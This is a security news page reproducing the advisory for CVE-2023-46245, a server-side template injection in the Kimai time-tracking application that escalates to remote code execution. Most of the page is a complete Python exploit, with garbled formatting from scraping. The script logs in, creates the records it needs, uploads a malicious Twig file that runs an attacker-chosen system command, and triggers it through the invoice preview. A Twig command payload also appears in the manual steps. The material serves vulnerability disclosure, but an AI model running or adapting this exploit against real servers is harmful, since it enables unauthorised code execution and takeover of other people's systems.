Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-46245: Kimai (Authenticated) SSTI to RCE by Uploading a Malicious Twig File

Kimai is a web-based multi-user time-tracking application. Versions 2.1.0 and prior are vulnerable to a Server-Side Template Injection (SSTI) which can be escalated to Remote Code Execution (RCE). The vulnerability arises when a malicious user uploads a specially crafted Twig file, exploiting the software’s PDF and HTML rendering functionalities. As of time of publication, no patches or known workarounds are available.

CVE
#csrf#vulnerability#web#git#rce#pdf#auth

The laters version of Kimai is found to be vulnerable to a critical Server-Side Template Injection (SSTI) which can be escalated to Remote Code Execution (RCE). The vulnerability arises when a malicious user uploads a specially crafted Twig file, exploiting the software’s PDF and HTML rendering functionalities.

The vulnerability is triggered when the software attempts to render invoices, allowing the attacker to execute arbitrary code on the server.

Steps to Reproduce (Manually):
1- Upload a malicious Twig file to the server containing the following payload {{[‘id>/tmp/pwned’]|map(‘system’)|join}}
2- Trigger the SSTI vulnerability by downloading the invoices.
3- The malicious code gets executed, leading to RCE.
4- /tmp/pwned file will be created on the target system

import requests import re import string import random import sys

session = requests.session() BASE_URL = sys.argv[1]

def generate(size=6, chars=string.ascii_uppercase + string.digits): return '’.join(random.choice(chars) for _ in range(size))

def get_csrf(path, session): try: project_id = “” csrf_token = “” preview_id = “” template_ids = [] activity_customer_list = []

    csrf\_login\_response \= session.get(f"{BASE\_URL}{path}").text
    
    \# Extract CSRF Token
    pattern \= re.compile(r'<input\[^>\]\*?name=\["\\'\].\*?token\[^"\\'\]\*\["\\'\]\[^>\]\*?value=\["\\'\](.\*?)\["\\'\]\[^>\]\*?>', re.IGNORECASE)
    match \= pattern.search(csrf\_login\_response)
    if match:
        csrf\_token \= match.group(1)
    
    if "performSearch" in path:
        preview\_pattern \= re.compile(r'<div\[^>\]\*id="preview-token"\[^>\]\*data-value="(.\*?)"\[^>\]\*>', re.IGNORECASE)
        preview\_match \= preview\_pattern.search(csrf\_login\_response)
        if preview\_match:
            preview\_id \= preview\_match.group(1)

    
    template\_pattern \= re.compile(r'<option value="(\\d+)" selected="selected">', re.IGNORECASE)
    template\_matches \= template\_pattern.findall(csrf\_login\_response)
    if template\_matches:
        template\_ids \= \[int(id) for id in template\_matches\]
    
    if "timesheet" in path:
        option\_pattern \= re.compile(r'<option value="(\\d+)" data-customer="(\\d+)" data-currency="EUR">', re.IGNORECASE)
        option\_matches \= option\_pattern.findall(csrf\_login\_response)
        if option\_matches:
            activity\_customer\_list \= \[(int(activity\_id), int(customer\_id)) for activity\_id, customer\_id in option\_matches\]
    
    if "project" in path or "activity" in path:
        project\_id\_match \= re.search(r'<option value="(\\d+)"\[^>\]\*data-currency="EUR"\[^>\]\*>', csrf\_login\_response)
        if project\_id\_match:
            project\_id \= project\_id\_match.group(1)
    
    return csrf\_token, project\_id, preview\_id, template\_ids, activity\_customer\_list

except Exception as e:
    print(f"Error occurred: {e}")
    return None, None, None, None, None

def login(username,password,csrf,session): try: params = {"_username": username, “_password": password, “_csrf_token": csrf} login_response = session.post(f"{BASE_URL}/login_check", data=params, allow_redirects=True) if “I forgot my password” not in login_response.text: print(f”[+] Logged in: {username}”) return session else: print("Wrong username,password", username) exit(1) except Exception as e: print(str(e)) pass

def create_customer(token,name,session): try:

    data \= {
        'customer\_edit\_form\[name\]': (None, name),
        'customer\_edit\_form\[color\]': (None, ''),
        'customer\_edit\_form\[comment\]': (None, 'xx'),
        'customer\_edit\_form\[address\]': (None, 'xx'),
        'customer\_edit\_form\[company\]': (None, ''),
        'customer\_edit\_form\[number\]': (None, '0002'),
        'customer\_edit\_form\[vatId\]': (None, ''),
        'customer\_edit\_form\[country\]': (None, 'DE'),
        'customer\_edit\_form\[currency\]': (None, 'EUR'),
        'customer\_edit\_form\[timezone\]': (None, 'UTC'),
        'customer\_edit\_form\[contact\]': (None, ''),
        'customer\_edit\_form\[email\]': (None, ''),
        'customer\_edit\_form\[homepage\]': (None, ''),
        'customer\_edit\_form\[mobile\]': (None, ''),
        'customer\_edit\_form\[phone\]': (None, ''),
        'customer\_edit\_form\[fax\]': (None, ''),
        'customer\_edit\_form\[budget\]': (None, '0.00'),
        'customer\_edit\_form\[timeBudget\]': (None, '0:00'),
        'customer\_edit\_form\[budgetType\]': (None, ''),
        'customer\_edit\_form\[visible\]': (None, '1'),
        'customer\_edit\_form\[billable\]': (None, '1'),
        'customer\_edit\_form\[invoiceTemplate\]': (None, ''),
        'customer\_edit\_form\[invoiceText\]': (None, ''),
        'customer\_edit\_form\[\_token\]': (None, token),
    }


    response \= session.post(f"{BASE\_URL}/admin/customer/create", files\=data)

except Exception as e:
    print(str(e))

def create_project(token, name,project_id ,session): try: form_data = { 'project_edit_form[name]': (None, name), 'project_edit_form[color]': (None, ‘’), 'project_edit_form[comment]': (None, ‘’), 'project_edit_form[customer]': (None, project_id), 'project_edit_form[orderNumber]': (None, ‘’), 'project_edit_form[orderDate]': (None, ‘’), 'project_edit_form[start]': (None, ‘’), 'project_edit_form[end]': (None, ‘’), 'project_edit_form[budget]': (None, ‘0.00’), 'project_edit_form[timeBudget]': (None, ‘0:00’), 'project_edit_form[budgetType]': (None, ‘’), 'project_edit_form[visible]': (None, ‘1’), 'project_edit_form[billable]': (None, ‘1’), 'project_edit_form[globalActivities]': (None, ‘1’), 'project_edit_form[invoiceText]': (None, ‘’), 'project_edit_form[_token]': (None, token) }

    response \= session.post(f"{BASE\_URL}/admin/project/create", files\=form\_data)
    
except Exception as e:
    print(str(e))

def create_activity(token, name,project_id ,session): try: form_data = { 'activity_edit_form[name]': (None, name), 'activity_edit_form[color]': (None, ‘’), 'activity_edit_form[comment]': (None, ‘’), 'activity_edit_form[project]': (None, ‘’), 'activity_edit_form[budget]': (None, ‘0.00’), 'activity_edit_form[timeBudget]': (None, ‘0:00’), 'activity_edit_form[budgetType]': (None, ‘’), 'activity_edit_form[visible]': (None, ‘1’), 'activity_edit_form[billable]': (None, ‘1’), 'activity_edit_form[invoiceText]': (None, ‘’), 'activity_edit_form[_token]': (None, token), }

    response \= session.post(f"{BASE\_URL}/admin/activity/create", files\=form\_data)
    
    if response.status\_code \== 201:
        print(f"\[+\] Activity created: {name}")

except Exception as e:
    print(f"An error occurred: {str(e)}")

def upload_malicious_document(token,session): try: form_data = { 'invoice_document_upload_form[document]': ('din.pdf.twig’, f"<html><body>{{{{[‘{sys.argv[4]}’]|map(‘system’)|join}}}}</body></html>", ‘text/x-twig’), 'invoice_document_upload_form[_token]': (None, token) }

    response \= session.post(f"{BASE\_URL}/invoice/document\_upload", files\=form\_data)
    
    if ".pdf.twig" in response.text:
        print("\[+\] Twig uploaded successfully!")
    else:
        print("\[-\] Error while uploading, exiting..")
        exit(1)

except Exception as e:
    print(f"An error occurred: {str(e)}")

import re

def create_malicious_template(token, name, session): try: data = { 'invoice_template_form[name]': name, 'invoice_template_form[title]': name, 'invoice_template_form[company]': name, 'invoice_template_form[vatId]': '’, 'invoice_template_form[address]': '’, 'invoice_template_form[contact]': '’, 'invoice_template_form[paymentTerms]': '’, 'invoice_template_form[paymentDetails]': '’, 'invoice_template_form[dueDays]': '30’, 'invoice_template_form[vat]': '0.000’, 'invoice_template_form[language]': 'en’, 'invoice_template_form[numberGenerator]': 'default’, 'invoice_template_form[renderer]': 'din’, 'invoice_template_form[calculator]': 'default’, 'invoice_template_form[_token]': token }

    response \= session.post(f"{BASE\_URL}/invoice/template/create", data\=data)
    
    \# Define the regex pattern to capture the template ID and match the name
    pattern \= re.compile(fr'<tr class="modal-ajax-form open-edit" data-href="/en/invoice/template/(\\d+)/edit">\\s\*<td class="alwaysVisible col\_name">{re.escape(name)}</td>', re.DOTALL)
    
    \# Search the response text with the regex pattern
    match \= pattern.search(response.text)
    
    if match:
        template\_id \= match.group(1)  \# Extract the captured group
        print(f"\[+\] Malicious Template: {name}, Template ID: {template\_id}")
        return template\_id  \# Return the captured template ID
    else:
        print("\[-\] Failed to capture the template ID")
        create\_malicious\_template(token,name,session)
    
except Exception as e:
    print(f"An error occurred: {str(e)}")
    exit(1)

def create_timesheet(token, activity, project, session): form_data = { 'timesheet_edit_form[begin_date]': (None, ‘01/01/1980’), 'timesheet_edit_form[begin_time]': (None, ‘12:00 AM’), 'timesheet_edit_form[duration]': (None, ‘0:15’), 'timesheet_edit_form[end_time]': (None, ‘12:15 AM’), 'timesheet_edit_form[customer]': (None, ‘’), 'timesheet_edit_form[project]': (None, project), 'timesheet_edit_form[activity]': (None, activity), 'timesheet_edit_form[description]': (None, ‘’), 'timesheet_edit_form[fixedRate]': (None, ‘’), 'timesheet_edit_form[hourlyRate]': (None, ‘’), 'timesheet_edit_form[billableMode]': (None, ‘auto’), 'timesheet_edit_form[_token]': (None, token) } response = session.post(f"{BASE_URL}/timesheet/create", files=form_data,allow_redirects=False) if response.status_code == 302: # Changed to 200 as 301 is for redirection print(f"[+] Created a new timesheet")

##############################

# login csrf, _, _, _, _ = get_csrf("/login", session) # login("admin", "password", csrf, session) login(sys.argv[2],sys.argv[3],csrf,session) # create new customer

get_customer_token, _, _, _, _ = get_csrf("/admin/customer/create", session)
customer_name = generate() create_customer(get_customer_token, customer_name, session) # create new project with customer_name

get_project_token, customer_id, _, _, _ = get_csrf("/admin/project/create", session)
project_name = generate() create_project(get_project_token, project_name, customer_id, session)

# create new activity get_activity_token, project_id, _, _, _ = get_csrf("/admin/activity/create", session) activity_name = generate() create_activity(get_activity_token, activity_name, project_id, session)

# EXPLOIT ######################

# upload malicious file upload_token, _, _, _, _ = get_csrf("/invoice/document_upload", session) upload_malicious_document(upload_token, session)

# create malicious template to trigger the SSTI get_template_token, _, _, _, _ = get_csrf("/invoice/template/create", session) template = generate() temp_id = create_malicious_template(get_template_token, template, session)

# create a timesheet with project_id and activity_id activity_customer_list = get_csrf("/timesheet/create", session)[4] # get the activity_customer_list from get_csrf function

print(f"[+] Constructing renderer URLs…") # iterate through all relative project_ids and customer_id for exploit stabiliy for activity_id, customer_id in activity_customer_list: csrf = get_csrf(“/timesheet/create", session)[0] # Update CSRF token for each iteration print(f”[+] Creating timesheets with: Activity ID: {activity_id}, Customer ID: {customer_id}") create_timesheet(csrf, activity_id, customer_id, session) postData = { "searchTerm": "", "daterange": "", "state": "1", "billable": "0", "exported": "1", "orderBy": "begin", "order": "DESC", "exporter": “pdf” } # export timesheets so they appear in exported invoices export = session.post(f"{BASE_URL}/timesheet/export/", data=postData).text if “PDF-1.4” in export: csrf, _, _, _, _ = get_csrf(“/invoice/", session) # get preview token to construct the preview URL to trigger SSTI csrf, project_id, preview_id, template_ids, activity_customer_list = get_csrf(f"/invoice/?searchTerm=&daterange=&exported=1&invoiceDate=1%2F1%2F1980&performSearch=performSearch&_token={csrf}&template={temp_id}", session) for template_id in template_ids: rendererURL = f"{BASE_URL}/invoice/preview/{customer_id}/{preview_id}?searchTerm=&daterange=&exported=1&template={temp_id}&invoiceDate=&_token={csrf}&customers[]={customer_id}” # trigger the payload by visiting the renderer URL rce = session.get(rendererURL)

        if "PDF-1.4" in rce.text:
            print(rendererURL)
            print("\[+\] successfully executed payload")
            \# save the pdf locally since rendered URL will expire as soon as we end the session
            pdf \= f"{generate()}.pdf"
            with open(pdf,'wb') as pdfFile:
                pdfFile.write(rce.content)
                pdfFile.flush()
                pdfFile.close()
                print(f"\[+\] Saved results with name: {pdf}")
            exit(1)

print("[-] Failed to execute payload, try to trigger manually…")

Related news

GHSA-fjhg-96cp-6fcw: Kimai (Authenticated) SSTI to RCE by Uploading a Malicious Twig File

# Description The laters version of Kimai is found to be vulnerable to a critical Server-Side Template Injection (SSTI) which can be escalated to Remote Code Execution (RCE). The vulnerability arises when a malicious user uploads a specially crafted Twig file, exploiting the software's PDF and HTML rendering functionalities. Snippet of Vulnerable Code: ```php public function render(array $timesheets, TimesheetQuery $query): Response { ... $content = $this->twig->render($this->getTemplate(), array_merge([ 'entries' => $timesheets, 'query' => $query, ... ], $this->getOptions($query))); ... $content = $this->converter->convertToPdf($content, $pdfOptions); ... return $this->createPdfResponse($content, $context); } ``` The vulnerability is triggered when the software attempts to render invoices, allowing the attacker to execute arbitrary code on the server. In below, you can find the docker-compose file was used for this testing: ``...

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907